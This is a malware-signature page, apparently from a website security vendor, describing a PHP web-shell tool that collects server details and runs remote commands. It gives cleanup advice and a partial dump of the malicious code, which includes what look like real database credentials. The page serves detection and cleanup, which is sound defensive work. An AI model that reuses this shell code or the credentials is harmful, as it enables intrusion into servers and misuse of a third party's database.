Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.exploit.sysinfo.001.02

php.exploit.sysinfo.001.02

PHP exploits are server-side malicious scripts which are commonly used as exploit. Exploit is piece of code that takes advantage of a bug, glitch or vulnerability, usually to gain control of a system it aims on. Typical targets are admin sections of various Content Management Systems or Website Administration Systems such as cPanel and others.
This tool gathers sensitive information from the server. In this case, system informatio, users, running services and also tries to execute remote commands when determinated applications are found.

Affecting

Any vulnerable website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Cleanup is done by deleting the malicious code inside the file or replacing it with a fresh version. The infection can be found in your system by searching for suspicious eval() code inside your site's files. Also, you can sign up with us and let our team remove the malware for you.

Dump

error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
$mohajer = getcwd();
$crystal = php_uname();
$arab4se =
$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");

///////////////////////////////
//
$mysql_use = "no"; //"yes" //
$mhost = "localhost"; //
$muser = "gsemiat_gsemiat"; //
$mpass = "1313947"; //
$mdb = "gsemiat_vb"; //
//

if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
//// fucking mode secorte //////

///////----------------------------------------------------///////////
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "<font color="red">ON (secure)</font>";